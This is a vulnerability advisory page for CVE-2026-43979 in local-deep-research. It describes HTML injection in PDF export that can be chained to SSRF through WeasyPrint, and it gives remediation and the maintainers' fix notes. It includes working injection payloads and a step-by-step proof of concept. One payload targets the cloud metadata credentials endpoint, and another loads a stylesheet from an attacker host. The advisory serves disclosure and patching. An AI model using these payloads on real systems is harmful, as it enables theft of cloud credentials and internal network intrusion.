5

CVSS Score

3.1

-

CVSS Score

Basic Information

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2026-43979

CVE-2026-43979: local-deep-research is Vulnerable to HTML Injection via Unescaped User Input in PDF Export (`pdf_service.py:_markdown_to_html`)

Summary

PDFService._markdown_to_html() constructs an HTML document by interpolating user-controlled values — specifically title (sourced from research.title or research.query) and metadata key-value pairs — directly into an f-string without any HTML escaping. An authenticated attacker can craft a research query containing HTML special characters to inject arbitrary HTML tags into the document processed by WeasyPrint during PDF export. This injection can be chained to trigger a Server-Side Request Forgery (SSRF), bypassing the application's existing SSRF defenses in ssrf_validator.py.

Details

Vulnerable code: src/local_deep_research/web/services/pdf_service.py, lines 171–176

# pdf_service.py:171-176
if title:
    html_parts.append(f"<title>{title}</title>")   # ← title is not escaped

if metadata:
    for key, value in metadata.items():
        html_parts.append(f'<meta name="{key}" content="{value}">')  # ← key/value are not escaped

Data flow trace:

User input: research.query
        │
        ▼
research_routes.py:1321
  pdf_title = research.title or research.query
        │
        ▼
research_routes.py:1325-1326
  export_report_to_memory(report_content, format, title=pdf_title)
        │
        ▼
pdf_service.py:107
  PDFService.markdown_to_pdf(markdown_content, title=pdf_title)
        │
        ▼
pdf_service.py:137
  _markdown_to_html(markdown_content, title, metadata)
        │
        ▼
pdf_service.py:172
  f"<title>{title}</title>"   ← injection point, no escaping
        │
        ▼
pdf_service.py:112
  HTML(string=html_content)   ← WeasyPrint renders the injected HTML

research.query is a string submitted by the user via POST /api/start_research, stored as-is in the database, and retrieved without any sanitization. When the user triggers POST /api/v1/research/<research_id>/export/pdf, this value is embedded unescaped into the HTML document processed by WeasyPrint.

Injection point 1: <title> tag breakout

Input:    </title><img src="http://169.254.169.254/latest/meta-data/" />
Rendered: <title></title><img src="http://169.254.169.254/latest/meta-data/" /></title>

When WeasyPrint encounters the injected <img> tag, it issues an HTTP GET request to the value of src by default.

Injection point 2: <meta> attribute breakout

Input:    " /><link rel="stylesheet" href="http://attacker.com/evil.css
Rendered: <meta name="..." content="" /><link rel="stylesheet" href="http://attacker.com/evil.css">

WeasyPrint will fetch and apply the external stylesheet, which also constitutes SSRF.

Proof of Concept

Step 1: Log in and submit a research query containing the injection payload

POST /api/start_research HTTP/1.1
Host: localhost:5000
Content-Type: application/json
Cookie: session=<valid_session>

{
  "query": "</title><img src=\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\" onerror=\"x\"/>",
  "mode": "quick",
  "model_provider": "OLLAMA",
  "model": "llama3"
}

The response returns a research_id, e.g. "aaaa-bbbb-cccc-dddd".

Step 2: After the research completes, trigger PDF export

POST /api/v1/research/aaaa-bbbb-cccc-dddd/export/pdf HTTP/1.1
Host: localhost:5000
Cookie: session=<valid_session>
X-CSRFToken: <csrf_token>

Step 3: Intermediate HTML constructed server-side

<!DOCTYPE html><html><head>
<meta charset="utf-8">
<title></title><img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" onerror="x"/></title>
</head><body>
...report content...
</body></html>

Step 4: WeasyPrint issues an outbound HTTP request to the injected URL

Observed in network monitoring (e.g. tcpdump) or the target internal service logs:

GET /latest/meta-data/iam/security-credentials/ HTTP/1.1
Host: 169.254.169.254
User-Agent: WeasyPrint/...

Lightweight verification (no SSRF environment required):

Set the query to:

</title><title>INJECTED

The resulting HTML will contain two <title> tags and the PDF document metadata title will read INJECTED, confirming successful injection.

Impact

1. Chained SSRF (High Severity)

By injecting <img src>, <link href>, or <style>@import url() tags pointing to internal addresses, WeasyPrint will issue HTTP requests on behalf of the server during PDF generation. This allows access to:

Cloud metadata services (169.254.169.254) on AWS, GCP, or Azure — enabling theft of IAM credentials and instance identity documents.
Internal network services (192.168.x.x, 10.x.x.x) — enabling reconnaissance and interaction with internal APIs not exposed to the internet.
Localhost administrative interfaces — if SSRF protections are only applied at the user-input validation layer.

This is an effective bypass of the application's existing SSRF defenses in ssrf_validator.py, because WeasyPrint's outbound resource requests are never routed through that validator.

2. HTML Document Structure Corruption

Injected tags can prematurely close <head> and insert arbitrary content into <body>, causing WeasyPrint to render incorrectly or crash, resulting in a Denial of Service (DoS) condition for the export functionality.

3. CSS Injection (Medium Severity)

By injecting <link> or <style> tags that load external stylesheets, an attacker can fully control the visual content of the generated PDF, enabling report content forgery or spoofing.

4. Affected Scope

All PDF export operations are affected.
The vulnerability is reachable by any authenticated user — no elevated privileges required.
Because each user operates against their own encrypted database, cross-user exploitation is not possible. However, on any shared or multi-tenant deployment, every authenticated user can independently trigger this vulnerability.

Remediation

Apply html.escape() to all user-controlled values before embedding them in the HTML template inside _markdown_to_html:

import html

if title:
    html_parts.append(f"<title>{html.escape(title)}</title>")

if metadata:
    for key, value in metadata.items():
        html_parts.append(
            f'<meta name="{html.escape(str(key))}" content="{html.escape(str(value))}">'
        )

Additionally, consider configuring WeasyPrint with a custom url_fetcher that blocks or restricts outbound HTTP requests to prevent SSRF via injected or legitimately-embedded external resources:

def safe_url_fetcher(url, timeout=10):
    from ssrf_validator import validate_url
    if not validate_url(url):
        raise ValueError(f"Blocked unsafe URL in PDF rendering: {url}")
    return weasyprint.default_url_fetcher(url, timeout=timeout)

html_doc = HTML(string=html_content, url_fetcher=safe_url_fetcher)

Report generated against commit f3540fb3 — local-deep-research, branch main.

Maintainer note (2026-04-24)

Thanks @Firebasky for the detailed report. The complete remediation spans two PRs, both merged to main:

#3082 (merged 2026-03-29, shipped in v1.5.0+) — closes the HTML-injection sinks:

html.escape() now wraps the title value in <title>…</title>
Same for metadata keys/values in <meta name="…" content="…">
Regression tests added in tests/web/services/test_pdf_service.py

#3613 (merged 2026-04-24, shipped in v1.6.0) — implements the url_fetcher recommendation from the Remediation section:

New _safe_url_fetcher in pdf_service.py delegates to weasyprint.default_url_fetcher only after security.ssrf_validator.validate_url accepts the URL
Blocks AWS metadata (169.254.169.254), RFC1918, loopback, and non-http(s) schemes
Covers the chained SSRF path through any URL reaching the rendered HTML — markdown body, citations, raw-HTML passthrough via Python-Markdown
Blocked URLs raise UnsafePDFResourceURLError (a ValueError subclass) so WeasyPrint skips the resource and the render continues
8 regression tests, including an end-to-end render with <img src="http://169.254.169.254/…"> embedded in the body

Advisory metadata: CVSS CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N (5.0 Moderate), CWEs CWE-79 + CWE-918. Patched in v1.6.0 — upgrade to v1.6.0 or later to receive both fixes.

(GitHub Advisory)

Miggo Vulnerability Database

→

CVE-2026-43979

CVE-2026-43979:

5

CVSS Score

3.1

-

CVSS Score

Basic Information

Is this CVE running in your environment?

Easily map the attack path and prioritize which CVEs are a threat to your organization

Validate Exposure

Technical Details

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
local-deep-research	pip	< 1.6.0	1.6.0

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability is an HTML injection in the PDF export functionality of the local-deep-research application, which can be chained to achieve Server-Side Request Forgery (SSRF). The core of the vulnerability lies in the PDFService._markdown_to_html function, where user-controlled input (title and metadata) is used to construct an HTML document without proper sanitization or escaping. This allows an attacker to inject arbitrary HTML tags.

The injected HTML is then processed by the WeasyPrint library within the PDFService.markdown_to_pdf function. In its vulnerable state, this function did not restrict WeasyPrint's ability to fetch external resources. Consequently, an attacker could inject an <img> or <link> tag with a src or href attribute pointing to an internal network address. When WeasyPrint renders the PDF, it makes a request to this internal address on behalf of the server, leading to SSRF. This could allow an attacker to access cloud provider metadata services, internal APIs, or other sensitive resources.

The remediation was applied in two stages. First, the HTML injection was fixed in _markdown_to_html by applying html.escape() to the user-provided data. Second, as a defense-in-depth measure, markdown_to_pdf was updated to use a custom url_fetcher that validates and blocks requests to internal or unsafe URLs, preventing the SSRF vector.

Vulnerable functions

PDFService._markdown_to_html

src/local_deep_research/web/services/pdf_service.py

This function constructs an HTML document by directly embedding the `title` and `metadata` values from user input into an f-string without any HTML escaping. An attacker can provide a malicious string with HTML tags, which are then rendered as part of the document, leading to HTML injection. This is the root cause of the vulnerability.

Vulnerability Intelligence
Miggo AI

Unlock WAF rules for this CVE

Generate vendor-ready rules for the observed attack patterns, plus reasoning and safe deployment guidance

Get WAF rules

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

5

-

Basic Information

Basic Information

Concerned about an active attack path?

CVE-2026-43979: local-deep-research is Vulnerable to HTML Injection via Unescaped User Input in PDF Export (`pdf_service.py:_markdown_to_html`)

Summary

Details

Proof of Concept

Impact

1. Chained SSRF (High Severity)

2. HTML Document Structure Corruption

3. CSS Injection (Medium Severity)

4. Affected Scope

Remediation

Maintainer note (2026-04-24)

CVE-2026-43979:

5

-

Basic Information

Basic Information

Is this CVE running in your environment?

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

Vulnerability IntelligenceMiggo AI

Unlock WAF rules for this CVE

WAF Protection Rules

WAF Rule

Reasoning

Technical Details

Basic Information

Basic Information

CVE-2026-43979: local-deep-research is Vulnerable to HTML Injection via Unescaped User Input in PDF Export (`pdf_service.py:_markdown_to_html`)

Summary

Details

Proof of Concept

Impact

1. Chained SSRF (High Severity)

2. HTML Document Structure Corruption

3. CSS Injection (Medium Severity)

4. Affected Scope

Remediation

Maintainer note (2026-04-24)

5

5

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI